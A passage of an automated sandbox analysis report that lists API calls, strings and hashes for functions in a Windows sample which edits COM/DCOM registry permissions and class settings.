Function 002090DA Relevance: 1.5, APIs: 1, Instructions: 3clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(?), ref: 002090DD

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: ClipboardOpen
String ID:
API String ID: 2793039342-0
Opcode ID: 65a41d72f966c85c72981d75e7e299d155ce8622c07336cdfa853f7374ffc57a
Instruction ID: 3b068237314f1066ee3fb3ef00ad361855e457b66aeeb86d9308ede6c98fdb41
Opcode Fuzzy Hash: 65a41d72f966c85c72981d75e7e299d155ce8622c07336cdfa853f7374ffc57a
Instruction Fuzzy Hash: 249002B14100408BCE026B10FD0C4447B31FB55306320419490594D071CB225423DA00

Function 6C4E86D4 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 6C4E86D4

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 6959e5a06026b7529cde1805fa607d0956bc2eab8b7f4e58deb72aca90008c91
Instruction ID: c0956f13d3801d570a3514707314d5627c58bef68e46478f59aeb2e9a15668bb
Opcode Fuzzy Hash: 6959e5a06026b7529cde1805fa607d0956bc2eab8b7f4e58deb72aca90008c91
Instruction Fuzzy Hash: 09A00270706101DF5F44DE35990530939B579865D1705C0559415C6151D62445505F11

Function 0020C0BC Relevance: 72.1, APIs: 36, Strings: 5, Instructions: 318windowregistryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0020C0C6
#540.MFC42U(00000488,001FC76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 0020C0F1
RegOpenKeyExW.ADVAPI32 ref: 0020C112
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0020C13A
RegCloseKey.ADVAPI32(?), ref: 0020C151
#800.MFC42U ref: 0020C15F
malloc.MSVCRT ref: 0020C174
RegCloseKey.ADVAPI32(?), ref: 0020C18D
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0020C1B4
RegCloseKey.ADVAPI32(?), ref: 0020C1C2
free.MSVCRT ref: 0020C1CD
GetSecurityDescriptorDacl.ADVAPI32(00000000,?,?,?), ref: 0020C1EC
GetLastError.KERNEL32 ref: 0020C1F6
#2810.MFC42U(?,Everyone), ref: 0020C21C
SendMessageW.USER32(?,00001053,000000FF,?), ref: 0020C250
SendMessageW.USER32(?,0000104D,00000000,?), ref: 0020C283
SendMessageW.USER32(?,00001053,000000FF,00000002), ref: 0020C29A
SendMessageW.USER32(?,0000104C,00000000,?), ref: 0020C2CA
free.MSVCRT ref: 0020C2D1
GetAce.ADVAPI32(00000000,00000000,?), ref: 0020C2EB
LookupAccountSidW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 0020C350
#2810.MFC42U(?,%s\%s,?,?), ref: 0020C374
#2810.MFC42U(?,?? Unknown Account ??), ref: 0020C38A
SendMessageW.USER32(?,00001053,000000FF,?), ref: 0020C3BE
SendMessageW.USER32(?,0000104D,00000000,?), ref: 0020C3F5
SendMessageW.USER32(?,00001053,000000FF,00000002), ref: 0020C40C
LookupAccountSidW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 0020C47D
#2810.MFC42U(?,%s\%s,?,?), ref: 0020C4A1
#2810.MFC42U(?,?? Unknown Account ??), ref: 0020C4B7
SendMessageW.USER32(?,00001053,000000FF,?), ref: 0020C4EB
SendMessageW.USER32(?,0000104D,00000000,?), ref: 0020C522
SendMessageW.USER32(?,00001053,000000FF,00000002), ref: 0020C539
SendMessageW.USER32(?,0000104C,00000000,?), ref: 0020C569
#3993.MFC42U(00000001,00000000,?? Unknown ACE ??,00000000,00000000,00000000,00000000), ref: 0020C57F
GetAce.ADVAPI32(00000000,00000001,?,00000001,00000000,?? Unknown ACE ??,00000000,00000000,00000000,00000000), ref: 0020C593
GetLastError.KERNEL32 ref: 0020C5AC

Strings

Yes, xrefs: 0020C2C0, 0020C42C
%s\%s, xrefs: 0020C36E, 0020C49B
Everyone, xrefs: 0020C216
?? Unknown ACE ??, xrefs: 0020C575
?? Unknown Account ??, xrefs: 0020C384, 0020C4B1

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: MessageSend$#2810$Close$AccountErrorLastLookupQueryValuefree$#3993#540#800DaclDescriptorH_prolog3_OpenSecuritymalloc
String ID: %s\%s$?? Unknown ACE ??$?? Unknown Account ??$Everyone$Yes
API String ID: 47226287-2762826609
Opcode ID: e1effd1c7738c79804606d3a1037c6cb9de3abc84540e6533931c2b15c51edf7
Instruction ID: e5ef73b043a409cbf04e966c68f6f8a348e64290942dd965c8931396a178c3fe
Opcode Fuzzy Hash: e1effd1c7738c79804606d3a1037c6cb9de3abc84540e6533931c2b15c51edf7
Instruction Fuzzy Hash: B4D1FDF591022D9FDB209F50DC88AEAB7BCEB48314F5046E9E709A2192DB705ED48F64

Function 00201870 Relevance: 66.8, APIs: 35, Strings: 3, Instructions: 263COMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00201877
#540.MFC42U(00000058,001FB66A), ref: 00201884
#540.MFC42U(00000058,001FB66A), ref: 00201891
#540.MFC42U(00000058,001FB66A), ref: 0020189F
#4155.MFC42U(00000004,00000058,001FB66A), ref: 002018AD
#4155.MFC42U(00000005,00000004,00000058,001FB66A), ref: 002018B7
#3517.MFC42U(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001F21A0,00000005), ref: 002018DE
#858.MFC42U(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001F21A0), ref: 002018EB
#800.MFC42U(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001F21A0), ref: 002018F7
#2910.MFC42U(000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00201910

Part of subcall function 0020DB5F: isspace.MSVCRT ref: 0020DB7C

Part of subcall function 0020DB5F: isxdigit.MSVCRT ref: 0020DBF6
Part of subcall function 0020DB5F: isspace.MSVCRT ref: 0020DC2E
Part of subcall function 0020DB5F: isspace.MSVCRT ref: 0020DC49

Part of subcall function 0020DB5F: isdigit.MSVCRT ref: 0020DBCD
Part of subcall function 0020DB5F: isdigit.MSVCRT ref: 0020DC1A

Part of subcall function 0020DB5F: toupper.MSVCRT ref: 0020DBE3

#5906.MFC42U(00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00201A67
#6205.MFC42U(?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00201A80
#6205.MFC42U(?,?,00000001,?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00201A92
#6191.MFC42U(0000002C,?,?,00000001,?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00201A9D
#800.MFC42U(0000002C,?,?,00000001,?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00201AA7
#800.MFC42U(0000002C,?,?,00000001,?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00201AAF
#800.MFC42U(0000002C,?,?,00000001,?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00201AB7
#1258.MFC42U(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001F21A0), ref: 00201B1E
__EH_prolog3_GS.LIBCMT ref: 00201B2B
#540.MFC42U(00000044,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00201B35
#540.MFC42U(00000044,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00201B41
#4155.MFC42U(00000004,00000044,00000000,?,?), ref: 00201B4F
#4155.MFC42U(00000005,00000004,00000044,00000000,?,?), ref: 00201B59
#540.MFC42U(00000005,00000004,00000044,00000000,?,?), ref: 00201B61
#3865.MFC42U(?,00000005,00000004,00000044,00000000,?,?), ref: 00201B77
#2970.MFC42U(00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00201B8C
#2910.MFC42U(000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00201B99
#3792.MFC42U(000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00201BA6
#3792.MFC42U(00000000,000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00201BB8
wsprintfW.USER32 ref: 00201BE8
#5568.MFC42U(000000FF), ref: 00201BF6
#6399.MFC42U(?,?,?,000000FF), ref: 00201C09
#800.MFC42U(?,?,?,000000FF), ref: 00201C11
#800.MFC42U(?,?,?,000000FF), ref: 00201C19
#800.MFC42U(?,?,?,000000FF), ref: 00201C21

Strings

,, xrefs: 00201B70
,, xrefs: 002018C7
%d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, xrefs: 00201BE2

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #800$#540$#4155$isspace$#2910#3792#6205isdigit$#1258#2970#3517#3865#5568#5906#6191#6399#858H_prolog3_H_prolog3_catch_isxdigittoupperwsprintf
String ID: %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d$,$,
API String ID: 708604890-3364495680
Opcode ID: 9e8ab5bd595cbd3dada14b22ae6f8b5a7af9e998023e9b874e6cc1e1bd375c7d
Instruction ID: 260160b89db79d9a184a070f066318412d56e329b60d14d4801e9023cebf2777
Opcode Fuzzy Hash: 9e8ab5bd595cbd3dada14b22ae6f8b5a7af9e998023e9b874e6cc1e1bd375c7d
Instruction Fuzzy Hash: 37A10A71D1120CAACF11EFE0C985AEDFBB9AF18304F54452AE115A71C3EB706A6ACF50

Function 002004B0 Relevance: 57.9, APIs: 25, Strings: 8, Instructions: 191registrywindowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 002004BA

Part of subcall function 0020D0B6: StringFromGUID2.OLE32(?,?,00000028,?,?,?,?,?,?,?), ref: 0020D152
Part of subcall function 0020D0B6: lstrcpyW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0020D163
Part of subcall function 0020D0B6: wsprintfW.USER32 ref: 0020D179
Part of subcall function 0020D0B6: RegOpenKeyW.ADVAPI32(80000000,CLSID,?), ref: 0020D1AA
Part of subcall function 0020D0B6: RegEnumKeyW.ADVAPI32(?,00000000,?,000000FF), ref: 0020D25C
Part of subcall function 0020D0B6: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0020D270
Part of subcall function 0020D0B6: wsprintfW.USER32 ref: 0020D286

LoadCursorW.USER32(00000000,00007F02), ref: 002004E6
SetCursor.USER32(00000000), ref: 002004ED

Part of subcall function 0020DE06: malloc.MSVCRT ref: 0020DE1E

#538.MFC42U(new CSecurityDescriptor failed.), ref: 00200528
#800.MFC42U(?,00000000,MakeSelfRelativeSD failed), ref: 00200754

Part of subcall function 0020CDEB: free.MSVCRT ref: 0020CE45
Part of subcall function 0020CDEB: free.MSVCRT ref: 0020CE55
Part of subcall function 0020CDEB: free.MSVCRT ref: 0020CE6D

#538.MFC42U(00000000,00000000), ref: 00200575
MakeSelfRelativeSD.ADVAPI32(00000000,00000000,?,Interactive,00000001,Administrators,00000001,System,00000001,00000000), ref: 002005BC
malloc.MSVCRT ref: 002005C8
#538.MFC42U(00000000), ref: 002005F5
MakeSelfRelativeSD.ADVAPI32(00000000,00000000,?), ref: 00200610
RegOpenKeyExW.ADVAPI32(80000000,?,00000000,000F003F,?), ref: 00200659
GetSecurityDescriptorLength.ADVAPI32(?), ref: 00200666
RegSetValueExW.ADVAPI32(?,LaunchPermission,00000000,00000003,?,00000000), ref: 0020067C
RegCloseKey.ADVAPI32(?), ref: 00200688
free.MSVCRT ref: 0020068F
#2634.MFC42U(00000001), ref: 002006B9
#2634.MFC42U(00000001,00000001), ref: 002006C6
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 002006D9
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 002006E9
#5977.MFC42U ref: 002006F2
LoadCursorW.USER32(00000000,00007F00), ref: 002006FD
SetCursor.USER32(00000000), ref: 00200704

Strings

CSecurityDescriptor::Initialize failed., xrefs: 0020056E
psdSelfRelative malloc failed., xrefs: 002005EE
Administrators, xrefs: 00200592
System, xrefs: 00200586
MakeSelfRelativeSD failed, xrefs: 0020072A
new CSecurityDescriptor failed., xrefs: 0020051D
LaunchPermission, xrefs: 00200671
Interactive, xrefs: 002005A0

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: Cursorfree$#538$#2634CloseLoadMakeMessageOpenRelativeSelfSendmallocwsprintf$#5977#800DescriptorEnumFromH_prolog3_LengthSecurityStringValuelstrcpy
String ID: Administrators$CSecurityDescriptor::Initialize failed.$Interactive$LaunchPermission$MakeSelfRelativeSD failed$System$new CSecurityDescriptor failed.$psdSelfRelative malloc failed.
API String ID: 3894545846-2955734171
Opcode ID: c900cfb11f8a29442d572f15e79ffaeb469cf655f9592c86d0e6b653204550e8
Instruction ID: d3c1a51f62e5468d55c2dc8a8df0ed0a14ab119334f1f2f2b6ee4fa3d72df277
Opcode Fuzzy Hash: c900cfb11f8a29442d572f15e79ffaeb469cf655f9592c86d0e6b653204550e8
Instruction Fuzzy Hash: E1619171950319ABDB20BFA0DC8DFEE7A78AF64300F4040A8B509AA1D3CF705A55CF60

Function 0020B8D5 Relevance: 54.5, APIs: 22, Strings: 9, Instructions: 250registryCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0020B8DC
LoadCursorW.USER32(00000000,00007F02), ref: 0020B8F4
SetCursor.USER32(00000000), ref: 0020B8FB
RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,?), ref: 0020B911
LoadCursorW.USER32(00000000,00007F00), ref: 0020B924
SetCursor.USER32(00000000), ref: 0020B92B
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0020B94C
RegCloseKey.ADVAPI32(?), ref: 0020BAA4

Strings

DefaultLaunchPermission, xrefs: 0020BA07
DefaultAccessPermission, xrefs: 0020BA41
CSecurityDescriptor::Initialize failed., xrefs: 0020B9E3
AccessPermission, xrefs: 0020BA51
Administrators, xrefs: 0020BA28
System, xrefs: 0020B9FD
new CSecurityDescriptor failed., xrefs: 0020B998
LaunchPermission, xrefs: 0020BA17
Interactive, xrefs: 0020BA35

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: Cursor$Load$CloseH_prolog3OpenQueryValue
String ID: AccessPermission$Administrators$CSecurityDescriptor::Initialize failed.$DefaultAccessPermission$DefaultLaunchPermission$Interactive$LaunchPermission$System$new CSecurityDescriptor failed.
API String ID: 2619828013-2246421441
Opcode ID: fcd426ff0187e3992d8c90e15022612709a241234a7f13a9af33d4d25a86c15d
Instruction ID: 0bd896438bffda39d45f2f1db30027875f5611a1fb844afac7cf54f6f7e7e0f2
Opcode Fuzzy Hash: fcd426ff0187e3992d8c90e15022612709a241234a7f13a9af33d4d25a86c15d
Instruction Fuzzy Hash: F8917171A1031AABDF21AFA0DC89EBEBBB9EF18311F104115F905A61E2DB349D10DF60

Function 001FFE60 Relevance: 49.3, APIs: 17, Strings: 11, Instructions: 285windowregistrystringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001FFE6A
#6330.MFC42U(00000001,00000408), ref: 001FFE73
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 001FFF2B
SendMessageW.USER32(?,00000148,00000000,?), ref: 001FFF44
lstrcmpW.KERNEL32(?,None), ref: 001FFF56
RegDeleteKeyW.ADVAPI32(80000000,00000000), ref: 001FFFC4
SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0020000B
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00200067
SendMessageW.USER32(?,00000148,00000000,?), ref: 00200080
lstrcmpW.KERNEL32(?,None), ref: 00200092
RegDeleteKeyW.ADVAPI32(80000000,00000000), ref: 00200111
#4118.MFC42U ref: 0020011D
SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00200135
#540.MFC42U(?,?,001F21A0,DllSurrogate), ref: 00200192
#3871.MFC42U(?), ref: 002001A8
RegDeleteKeyW.ADVAPI32(80000000,00000000), ref: 002001F7
#800.MFC42U(?,TreatAs,?,?), ref: 00200203

Strings

DllSurrogate, xrefs: 0020015A, 00200174
LocalService, xrefs: 001FFEB4, 001FFED5, 001FFEE6
InProcHandler32, xrefs: 001FFF09, 001FFF68, 001FFF8C, 001FFFAB
ServiceParameters, xrefs: 001FFED0
InProcServer32, xrefs: 00200024, 00200045, 002000A4, 002000DC, 002000F8
TreatAs, xrefs: 002001C2, 002001DE
ThreadingModel, xrefs: 001FFF63, 001FFF87, 0020009F, 002000D7
JavaClass, xrefs: 00200040
LocalServer32, xrefs: 001FFFE4, 001FFFF2
msjava.dll, xrefs: 0020001A
None, xrefs: 001FFF4A, 00200086

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: MessageSend$Delete$lstrcmp$#3871#4118#540#6330#800H_prolog3_
String ID: DllSurrogate$InProcHandler32$InProcServer32$JavaClass$LocalServer32$LocalService$None$ServiceParameters$ThreadingModel$TreatAs$msjava.dll
API String ID: 3854995924-1653547741
Opcode ID: f3cc3141f7d9752239a4ac90cdaef1e39a5c5afcf6ddacf5c225347f073ada94
Instruction ID: 012ddb9b888946eb9b5928df6608d98bd135e1f78ec9286fff308357380c880f
Opcode Fuzzy Hash: f3cc3141f7d9752239a4ac90cdaef1e39a5c5afcf6ddacf5c225347f073ada94
Instruction Fuzzy Hash: D3918D3155070AAAEB11FE248D8BFB77766AF02700F4404A4BF14AF0D7CBF1AA558B95

Function 001FC150 Relevance: 47.4, APIs: 22, Strings: 5, Instructions: 176registrywindowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001FC15A

Part of subcall function 0020D0B6: StringFromGUID2.OLE32(?,?,00000028,?,?,?,?,?,?,?), ref: 0020D152
Part of subcall function 0020D0B6: lstrcpyW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0020D163
Part of subcall function 0020D0B6: wsprintfW.USER32 ref: 0020D179
Part of subcall function 0020D0B6: RegOpenKeyW.ADVAPI32(80000000,CLSID,?), ref: 0020D1AA
Part of subcall function 0020D0B6: RegEnumKeyW.ADVAPI32(?,00000000,?,000000FF), ref: 0020D25C
Part of subcall function 0020D0B6: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0020D270
Part of subcall function 0020D0B6: wsprintfW.USER32 ref: 0020D286

LoadCursorW.USER32(00000000,00007F02), ref: 001FC186
SetCursor.USER32(00000000), ref: 001FC18D

Part of subcall function 0020DE06: malloc.MSVCRT ref: 0020DE1E

#538.MFC42U(new CSecurityDescriptor failed.), ref: 001FC1C8
#800.MFC42U(?,00000008,00000000), ref: 001FC1E8

Part of subcall function 0020CDEB: free.MSVCRT ref: 0020CE45
Part of subcall function 0020CDEB: free.MSVCRT ref: 0020CE55
Part of subcall function 0020CDEB: free.MSVCRT ref: 0020CE6D

#538.MFC42U(00000000,00000000), ref: 001FC21A
MakeSelfRelativeSD.ADVAPI32(00000000,00000000,?,?,00000001,?,System,00000001,00000000), ref: 001FC266
malloc.MSVCRT ref: 001FC272
#538.MFC42U(00000000), ref: 001FC29F
MakeSelfRelativeSD.ADVAPI32(00000000,00000000,?), ref: 001FC2CE
RegOpenKeyExW.ADVAPI32(80000000,?,00000000,000F003F,?), ref: 001FC313
GetSecurityDescriptorLength.ADVAPI32(?), ref: 001FC320
RegSetValueExW.ADVAPI32(?,AccessPermission,00000000,00000003,?,00000000), ref: 001FC336
RegCloseKey.ADVAPI32(?), ref: 001FC342
free.MSVCRT ref: 001FC349
#2634.MFC42U(00000001), ref: 001FC373
#2634.MFC42U(00000001,00000001), ref: 001FC380
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 001FC393
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 001FC3A3
#5977.MFC42U ref: 001FC3AC
LoadCursorW.USER32(00000000,00007F00), ref: 001FC3B7
SetCursor.USER32(00000000), ref: 001FC3BE

Strings

CSecurityDescriptor::Initialize failed., xrefs: 001FC213
psdSelfRelative malloc failed., xrefs: 001FC298
AccessPermission, xrefs: 001FC32B
System, xrefs: 001FC22B
new CSecurityDescriptor failed., xrefs: 001FC1BD

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: Cursorfree$#538$#2634CloseLoadMakeMessageOpenRelativeSelfSendmallocwsprintf$#5977#800DescriptorEnumFromH_prolog3_LengthSecurityStringValuelstrcpy
String ID: AccessPermission$CSecurityDescriptor::Initialize failed.$System$new CSecurityDescriptor failed.$psdSelfRelative malloc failed.
API String ID: 3894545846-3913380516
Opcode ID: 3a2d06b483e2e8bc7c7265452b81bfe01260c7b92217d52c39993ccb22ee0d8f
Instruction ID: a76970d64befc3dc1e09059bb238018e12c7dcdba6748ab7d0e2ebb1786b6ee4
Opcode Fuzzy Hash: 3a2d06b483e2e8bc7c7265452b81bfe01260c7b92217d52c39993ccb22ee0d8f
Instruction Fuzzy Hash: 5751617194031DABDB20BFA0DD8DFEE7A78AF69700F1040A4B609AA1D2CF705A55DF60

Function 00202FE0 Relevance: 45.8, APIs: 23, Strings: 3, Instructions: 275registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00207980: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0020798C

Part of subcall function 002078ED: GetFocus.USER32 ref: 002078ED
Part of subcall function 002078ED: #2859.MFC42U(00000000), ref: 002078F4

Part of subcall function 002078FA: SendMessageW.USER32(?,0000113E,00000000,00000014), ref: 0020790C

CLSIDFromString.OLE32(00000000,?,00000100), ref: 0020312B
wcstok.MSVCRT ref: 00203191
wcstol.MSVCRT ref: 0020319A
wcstok.MSVCRT ref: 002031BA
wcstol.MSVCRT ref: 002031C3
#1662.MFC42U(Version,001F21A0,?,00000100,00000100), ref: 002031DE
GetUserDefaultLCID.KERNEL32(Version,001F21A0,?,00000100,00000100), ref: 002031E3
LoadRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0020320F
GetSystemDefaultLCID.KERNEL32 ref: 00203227
LoadRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0020326D
RegOpenKeyW.ADVAPI32(80000000,TypeLib,?), ref: 0020329A
StringFromGUID2.OLE32(?,?,00000027), ref: 002032B5
RegOpenKeyW.ADVAPI32(?,?,?), ref: 002032CC
RegOpenKeyW.ADVAPI32(?,?,?), ref: 002032EA
LoadRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00203330
RegCloseKey.ADVAPI32(?,?,?), ref: 00203342
RegCloseKey.ADVAPI32(?), ref: 0020334E
RegCloseKey.ADVAPI32(?), ref: 0020335A
wsprintfW.USER32 ref: 00203395
#2644.MFC42U ref: 002033A4
#538.MFC42U(?), ref: 002033B6
#800.MFC42U(?,00000000,?), ref: 002033DB
#2644.MFC42U ref: 002033E8

Part of subcall function 00201C95: __EH_prolog3_GS.LIBCMT ref: 00201C9F
Part of subcall function 00201C95: StringFromGUID2.OLE32(?,?,00000028,000002BC,00204FBE,00000000,001F9ECC,?), ref: 00201CCE
Part of subcall function 00201C95: wsprintfW.USER32 ref: 00201CE4
Part of subcall function 00201C95: RegQueryValueW.ADVAPI32(80000000,?,?,000000A0), ref: 00201D1A
Part of subcall function 00201C95: lstrcpyW.KERNEL32(?,<no name>), ref: 00201D30
Part of subcall function 00201C95: RegQueryValueW.ADVAPI32(80000000,?,?,000000A0), ref: 00201D9E
Part of subcall function 00201C95: RegQueryValueW.ADVAPI32(80000002,?,?,000000A0), ref: 00201DEE
Part of subcall function 00201C95: CLSIDFromString.OLE32(?,?), ref: 00201E06

Strings

LoadRegTypeLib(%u, %u, %lu, &u ...) failed., xrefs: 00203389
Version, xrefs: 00203161
TypeLib, xrefs: 002030DE, 00203290

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: FromString$CloseLoadOpenQueryTypeValue$#2644DefaultMessageSendwcstokwcstolwsprintf$#1662#2859#538#800FocusH_prolog3_SystemUserlstrcpy
String ID: LoadRegTypeLib(%u, %u, %lu, &u ...) failed.$TypeLib$Version
API String ID: 672647845-2616143947
Opcode ID: 05d1cd1c23856d0743865ac831506c659b5e6394dd5e178d5fb6ccd9787d15a7
Instruction ID: 4af72335187bc4f709aad763e1d714a787fe1598ff2a0fc638b5913e31f225c8
Opcode Fuzzy Hash: 05d1cd1c23856d0743865ac831506c659b5e6394dd5e178d5fb6ccd9787d15a7
Instruction Fuzzy Hash: F1C117B19142289FDF20EF60DC49BE9B7BABF98314F0045E9E50DA7191DB725EA48F10

Function 001FE1A4 Relevance: 45.7, APIs: 22, Strings: 4, Instructions: 186windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0020D4CD: GetVersionExW.KERNEL32(?), ref: 0020D4F3

SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001FE1E5
SendMessageW.USER32(?,00001304,00000000,00000000), ref: 001FE1F9
SendMessageW.USER32(?,00001304,00000000,00000000), ref: 001FE219
SendMessageW.USER32(?,00001304,00000000,00000000), ref: 001FE242
#6211.MFC42U(00000005,?,?,?), ref: 001FE259
